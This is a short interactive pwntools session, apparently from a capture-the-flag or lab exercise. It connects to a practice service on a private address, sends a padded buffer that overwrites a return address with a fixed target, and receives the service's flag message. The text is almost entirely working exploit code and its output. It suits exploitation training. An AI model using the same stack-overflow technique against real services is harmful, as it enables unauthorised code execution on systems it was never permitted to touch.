>>> from pwn import * >>> target = 0x0804856B >>> r = remote('192.168.235.143',9992) [x] Opening connection to 192.168.235.143 on port 9992 [x] Opening connection to 192.168.235.143 on port 9992: Trying 192.168.235.143 [+] Opening connection to 192.168.235.143 on port 9992: Done >>> payload = 0x108*'a'+'bbbb'+p32(target) >>> r.sendline(payload) >>> r.recvline() 'Do you know "return address"?\n' >>> r.recvline() 'You got the right return address!\n' >>> r.recvline() 'Take your flag and keep going: 123\n' >>>